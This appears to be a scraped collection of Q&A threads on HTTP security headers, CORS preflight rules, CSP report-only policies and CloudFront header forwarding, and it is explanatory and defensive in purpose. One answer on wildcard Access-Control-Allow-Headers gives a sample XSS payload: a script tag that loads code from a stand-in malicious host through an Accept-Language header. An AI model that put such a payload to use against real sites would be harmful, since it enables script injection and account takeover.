for my web application, I'm configuring a set of OWASP security headers, like X-Frame-Options or X-Content-Type-Options. Now I'm wondering whether I should send all those headers for every request, or if I should use them only for specific requests, e.g., use the "full" bunch of security headers for get, post, delete, put, and send only CORS headers for preflight requests.
There is no harm in outputting the full security headers for each content type you serve (e.g. text/html, application/java) and for each request method (GET, PUT, etc).
However the ones that would be applicable for different requests and responses are discussed below.
Regarding returned content types:
X-Content-Type-Options especially needs to be on all content types, as otherwise types such as application/java could be interpreted differently by Internet Explorer with its content-sniffing.
X-Frame-Options for all content types to stop them being framed, although this does not prevent them being loaded by other means (e.g. <img> tag).
X-XSS-Protection added to HTML content types only should be enough.
Content-Security-Policy for HTML content types only should be enough.
Regarding HTTP methods (GET, POST, PUT etc):
Strict-Transport-Security is better if it is output on every request as it will renew the sliding expiration and it will also set the HSTS policy whichever way the resource was first requested.
Public Key Pinning Extension for HTTP for every request, in much the same way as the Strict-Transport-Security header in that once it has been output, the policy will be set. As this is the sooner the better, if the site does this for all requests there is more chance of it being set earlier.
Related
I'm a bit confused about the security aspects of CORS POST requests. I know there is a lot of information about this topic online, but I couldn't find a definite answer to my questions.
If I understood it correctly, the goal of the same-origin policy is to prevent CSRF attacks and the goal of CORS is to enable resource sharing if (and only if) the server agrees to share its data with applications hosted on other sites (origins).
HTTP specifies that POST requests are not 'safe', i.e. they might change the state of the server, e.g. by adding a new comment. When initiating a CORS request with the HTTP method POST, the browser only performs a 'safe' preflight request if the content-type of the request is non-standard (or if there are non-standard http headers). So POST requests with standard content-type and standard headers are executed and might have negative side effects on the server (although the response might not be accessible to the requesting script.)
There is this technique of adding a random token to every form, which the server then requires to be part of every non-'safe' request. If a script tries to forge a request, it either
does not have the random token and the server declines the request, or
it tries to access the form where the random token is defined. This response with the random token should have the appropriate head fields, such that the browser does not grant the evil script access to this response. Also in this case the attempt fails.
My conclusion is that the only protection against forged POST requests with standard content-type and headers is the technique described above (or a similar one). For any other non-'safe' request such as PUT or DELETE, or a POST with json-content, it is not necesssay to use the technique because CORS performs a 'safe' OPTIONS request.
Why did the authors of CORS exclude these POST exempt from preflight requests and therefore made it necessary to employ the technique described above?
See What is the motivation behind the introduction of preflight CORS requests?.
The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put new restrictions on what was already possible without CORS).
That is, with CORS, POST requests that you could do previously cross-origin are not preflighted—because browsers already allowed them before CORS existed, and servers knew about them. So CORS changes nothing about those “old” types of requests.
But prior to CORS, browsers wouldn’t allow you to do a cross-origin application/json POST at all, and so servers could assume they wouldn’t receive them. That’s why a CORS preflight is required for those types of “new” requests and not for the “old” ones—to give a heads-up to the server: this is a different “new” type of request that they must explicitly opt-in to supporting.
After reading a lot about CORS and pre-flight requests I still don't quite get why there are some exceptions for doing a pre-flight. Why does it matter if the Content-Type is text/plain or application/json?
If I get it right, the value of CORS is to restrict the returned data (It doesn't care if the POST destroyed the database, it only cares that the browser can't read the output of that operation). But if that's true (and probably It's not) why there are pre-flight requests at all? Wouldn't suffice to just check for a header like Access-Control-Allow-Cross-Origin-Request: true in the response?
The best answer so far I found in the: What is the motivation behind the introduction of preflight CORS requests? question, but it's still a bit confusing for me.
Why does it matter if the Content-Type is 'text/plain' or
'application/json'?
The three content types (enctype) supported by a form are as follows:
application/x-www-form-urlencoded
multipart/form-data
text/plain
If a form is received by a handler on the web server, and it is not one of the above content types then it can be assumed that it was an AJAX request that sent the form, and not an HTML <form /> tag.
Therefore, if an existing pre-CORS system is using the content type as a method of ensuring that the request is not cross-site in order to prevent Cross-Site Request Forgery (CSRF), then the authors of the CORS spec did not want to introduce any new security vulnerabilities into existing websites. They did this by insisting such requests initiate a preflight to ensure both the browser and the server are CORS compatible first.
It doesn't care if the POST destroyed the database, it only cares that
the browser can't read the output of that operation
Exactly right. By default browsers obey the Same Origin Policy. CORS relaxes this restriction, allowing another Origin to read responses from it made by AJAX.
why there are pre-flight requests at all?
As said, to ensure that both client and server are CORS compatible and it is not just an HTML form being sent that has always been able to be submitted cross domain.
e.g. this has always worked. A form on example.com POSTing to example.org:
<form method="post" action="//example.org/handler.php" />
Wouldn't suffice to just
check for a header like 'Access-Control-Allow-Cross-Origin-Request:
true' in the response?
Because of the CSRF vector. By checking that the browser can send a preflight, it ensures that the cross-origin request is authorised before the browser will send it (by examining CORS response headers). This enables the browser to protect the current user's session - remember that the attacker here is not the one running the browser, the victim is running the browser in a CSRF attack, therefore a manipulated browser that doesn't properly check CORS headers or spoofs a preflight would be of no advantage for an attacker to run themselves. Similarly, the preflight enables CSRF mitigations such as custom headers to work.
To summerise:
HTML form cross-origin
Can only be sent with certain enctype's
Cannot have custom headers
Browser will just send it without preflight because everything about a <form> submission will be standard (or "simple" as CORS puts it)
If server handler receives a request from such a form it will act upon it
AJAX cross-origin
Only possible via CORS
Early version of some browsers, like IE 8 & 9 could send cross-origin requests, but not with non-standard headers or enctype's
Can have custom headers and enctype's in fully supported browsers
In order to ensure that a cross-origin AJAX request is not spoofing a same-origin AJAX request (remember that cross-origin didn't used to be possible), if the AJAX request is not simple then the browser will send a preflight to ensure this is allowed
If server handler receives a request it will act upon it, but only if it has passed preflight checks because the initial request will be made with the OPTIONS verb and not until the browser agrees that the server is talking CORS will it send the actual GET or POST
I am working on addition of Content-Security-Policy-Report-Only header to my company's website. While I was researching on it, I found that a few of the pages already have Content-Security-Policy header set.
I investigated further and found that the directives are not required. Also, default directive used for those pages is 'self' whereas what I am planning to set for report-only is 'https:'
I am not an expert in this area and want to make sure that both header values don't interfere. Hence looking for guidance
If I set report-only for the pages that already has CSP header, is it going to interfere with existing headers? Is the behavior browser dependent?
Any help/pointers will be helpful in deciding.
Thanks!
Content-Security-Policy and Content-Security-Policy-Report-Only have no effect on each other and are entirely independent. Setting both is a common practice when tightening policies. I wouldn't doubt that there has been a bug around this behavior at some point, but the spec is clear.
From Section 5 of the CSP2 Spec
A server MAY cause user agents to monitor one policy while enforcing another policy by returning both Content-Security-Policy and Content-Security-Policy-Report-Only header fields. For example, if a server operator may wish to enforce one policy but experiment with a stricter policy, she can monitor the stricter policy while enforcing the original policy. Once the server operator is satisfied that the stricter policy does not break the web application, the server operator can start enforcing the stricter policy.
Based on the link here, server must not send both headers in the same request.
Here is the original text: A server MUST NOT provide Content-Security-Policy header field(s) and Content-Security-Policy-Report-Only header field(s) in the same HTTP response. If a client received both header fields in a response, it MUST discard all Content-Security-Policy-Report-Only header fields and MUST enforce the Content-Security-Policy header field.
I am using Amazon CloudFront to deliver some HDS files. I have an origin server which check the HTTP HEADER REFERER and in case is no allowed it block it.
The problem is that cloud front is removing the referer header, so it is not forwarded to the origin.
Is it possible to tell Amazon not to do it?
Within days of writing the answer below, changes have been announced to Cloudfront. Cloudfront will now pass through headers you select and can add some headers of its own.
However, much of what I stated below remains true. Note that in the announcement, an option is offered to forward all headers which, as I suggested, would effectively disable caching. There's also an option to forward specific headers, which will cause Cloudfront to cache the object against the complete set of forwarded headers -- not just the uri -- meaning that the effectiveness of the cache is somewhat reduced, since Cloudfront has no option but to assume that the inclusion of the header might modify the response the server will generate for that request.
Each of your CloudFront distributions now contains a list of headers that are to be forwarded to the origin server. You have three options:
None - This option requests the original behavior.
All - This option forwards all headers and effectively disables all caching at the edge.
Whitelist - This option give you full control of the headers that are to be forwarded. The list starts out empty, and grows as you add more headers. You can add common HTTP headers by choosing them from a list. You can also add "custom" headers by simply entering the name.
If you choose the Whitelist option, each header that you add to the list becomes part of the cache key for the URLs associated with the distribution. Adding a header to the list simply tells CloudFront that the value of the header can affect the content returned by the origin server.
http://aws.amazon.com/blogs/aws/enhanced-cloudfront-customization/
Cloudfront does remove the Referer header along with several others that are not particularly meaningful -- or whose presence would cause illogical consequences -- in the world of cached content.
http://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/RequestAndResponseBehaviorCustomOrigin.html
Just like cookies, if the Referer: header were allowed to remain, such that the origin could see it and react to it, that would imply that the object should be cached based on the request plus the referring page, which would seem to largely defeat the cachability of objects. Otherwise, if the origin did react to an undesired referer and send no-cache responses, that would be all well and good until the first legitimate request came in, the response to which would be served to subsequent requesters regardless of their referer, also largely defeating the purpose.
RFC-2616 Section 13 requires that a cache return a response that has been "checked for equivalence with what the origin server would have returned," and this implies that the response be valid based on all headers in the request.
The same thing goes for User-agent and other headers an origin server might use to modify its response... if you need to react to these values at the origin, there's little obvious purpose for serving them with a CDN.
Referring page-based tests are quite a primitive measure, the way many people use them, since headers are so trivial to forge.
If you are dealing with a platform that you don't control, and this is something you need to override (with a dummy value, just to keep the existing system "happy,") then a reverse proxy in front of the origin server could serve such a purpose, with Cloudfront using the reverse proxy as its origin.
In today's newsletter amazon announced that it is now possible to forward request headers with cloudfront. See: http://aws.amazon.com/de/about-aws/whats-new/2014/06/26/amazon-cloudfront-device-detection-geo-targeting-host-header-cors/
I recently had to set Access-Control-Allow-Origin to * in order to be able to make cross-subdomain AJAX calls. I feel like this might be a security problem. What risks am I exposing myself to if I keep the setting?
By responding with Access-Control-Allow-Origin: *, the requested resource allows sharing with every origin. This basically means that any site can send an XHR request to your site and access the server’s response which would not be the case if you hadn’t implemented this CORS response.
So any site can make a request to your site on behalf of their visitors and process its response. If you have something implemented like an authentication or authorization scheme that is based on something that is automatically provided by the browser (cookies, cookie-based sessions, etc.), the requests triggered by the third party sites will use them too.
This indeed poses a security risk, particularly if you allow resource sharing not just for selected resources but for every resource. In this context you should have a look at When is it safe to enable CORS?.
Update (2020-10-07)
Current Fetch Standard omits the credentials when credentials mode is set to include, if Access-Control-Allow-Origin is set to *.
Therefore, if you are using a cookie-based authentication, your credentials will not be sent on the request.
Access-Control-Allow-Origin: * is totally safe to add to any resource, unless that resource contains private data protected by something other than standard credentials. Standard credentials are cookies, HTTP basic auth, and TLS client certificates.
Eg: Data protected by cookies is safe
Imagine https://example.com/users-private-data, which may expose private data depending on the user's logged in state. This state uses a session cookie. It's safe to add Access-Control-Allow-Origin: * to this resource, as this header only allows access to the response if the request is made without cookies, and cookies are required to get the private data. As a result, no private data is leaked.
Eg: Data protected by location / ip / internal network is not safe (unfortunately common with intranets and home appliances):
Imagine https://intranet.example.com/company-private-data, which exposes private company data, but this can only be accessed if you're on the company's wifi network. It's not safe to add Access-Control-Allow-Origin: * to this resource, as it's protected using something other than standard credentials. Otherwise, a bad script could use you as a tunnel to the intranet.
Rule of thumb
Imagine what a user would see if they accessed the resource in an incognito window. If you're happy with everyone seeing this content (including the source code the browser received), it's safe to add Access-Control-Allow-Origin: *.
AFAIK, Access-Control-Allow-Origin is just a http header sent from the server to the browser. Limiting it to a specific address (or disabling it) does not make your site safer for, for example, robots. If robots want to, they can just ignore the header. The regular browsers out there (Explorer, Chrome, etc.) by default honor the header. But an application like Postman simply ignores it.
The server end doesn't actually check what the 'origin' is of the request when it returns the response. It just adds the http header. It's the browser (the client end) which sent the request that decides to read the access-control header and act upon it. Note that in the case of XHR it may use a special 'OPTIONS' request to ask for the headers first.
So, anyone with creative scripting abilities can easily ignore the whole header, whatever is set in it.
See also Possible security issues of setting Access-Control-Allow-Origin.
Now to actually answer the question
I can't help but feel that I'm putting my environment to security
risks.
If anyone wants to attack you, they can easily bypass the Access-Control-Allow-Origin. But by enabling '*' you do give the attacker a few more 'attack vectors' to play with, like, using regular webbrowsers that honor that HTTP header.
Here are 2 examples posted as comments, when a wildcard is really problematic:
Suppose I log into my bank's website. If I go to another page and then
go back to my bank, I'm still logged in because of a cookie. Other
users on the internet can hit the same URLs at my bank as I do, yet
they won't be able to access my account without the cookie. If
cross-origin requests are allowed, a malicious website can effectively
impersonate the user.
– Brad
Suppose you have a common home router, such as a Linksys WRT54g or
something. Suppose that router allows cross-origin requests. A script
on my web page could make HTTP requests to common router IP addresses
(like 192.168.1.1) and reconfigure your router to allow attacks. It
can even use your router directly as a DDoS node. (Most routers have
test pages which allow for pings or simple HTTP server checks. These
can be abused en masse.)
– Brad
I feel that these comments should have been answers, because they explain the problem with a real life example.
This answer was originally written as a reply to What are the security implications of setting Access-Control-Allow-Headers: *, if any? and was merged despite being irrelevant to this question.
To set it to a wildcard *, means to allow all headers apart from safelisted ones, and remove restrictions that keeps them safe.
These are the restrictions for the 4 safelisted headers to be considered safe:
For Accept-Language and Content-Language: can only have values consisting of 0-9, A-Z, a-z, space or *,-.;=.
For Accept and Content-Type: can't contain a CORS-unsafe request header byte: 0x00-0x1F (except for 0x09 (HT), which is allowed), "():<>?#[\]{}, and 0x7F (DEL).
For Content-Type: needs to have a MIME type of its parsed value (ignoring parameters) of either application/x-www-form-urlencoded, multipart/form-data, or text/plain.
For any header: the value’s length can't be greater than 128.
For simplicity's sake, I'll base my answer on these headers.
Depending on server implementation, simply removing these limitations can be very dangerous (to the user).
For example, this outdated wordpress plugin has a reflected XSS vulnerability where the value of Accept-Language was parsed and rendered on the page as-is, causing script execution on the user's browser should a malicious payload be included in the value.
With the wildcard header Access-Control-Allow-Headers: *, a third party site redirecting to your site could set the value of the header to Accept Language: <script src="https://example.com/malicious-script.js"></script>, given that the wildcard removes the restriction in Point 1 above.
The preflight response would then give the greenlight to this request, and the user will be redirected to your site, triggering an XSS on their browser, which impact can range from an annoying popup to losing control of their account through cookie hijacking.
Thus, I would strongly recommend against setting a wildcard unless it is for an API endpoint where nothing is being rendered on the page.
You can set Access-Control-Allow-Headers: Pragma as an alternative solution to your problem.
Note that the value * only counts as a special wildcard value for requests without credentials (requests without HTTP cookies or HTTP authentication information), otherwise it will be read as a literal header. Documentation
In scenario where server attempts to disable the CORS completely by setting below headers.
Access-Control-Allow-Origin: * (tells the browser that server accepts
cross site requests from any ORIGIN)
Access-Control-Allow-Credentials: true (tells the browser that cross
site requests can send cookies)
There is a fail safe implemented in browsers that will result in below error
"Credential is not supported if the CORS header ‘Access-Control-Allow-Origin’ is ‘*’"
So in most scenarios setting ‘Access-Control-Allow-Origin’ to * will not be a problem. However to secure against attacks, the server can maintain a list of allowed origins and whenever server gets a cross origin request, it can validate the ORIGIN header against the list of allowed origins and then echo back the same in Access-Control-Allow-Origin header.
Since ORIGIN header can't be changed by javascript running on the browser, the malicious site will not be able to spoof it.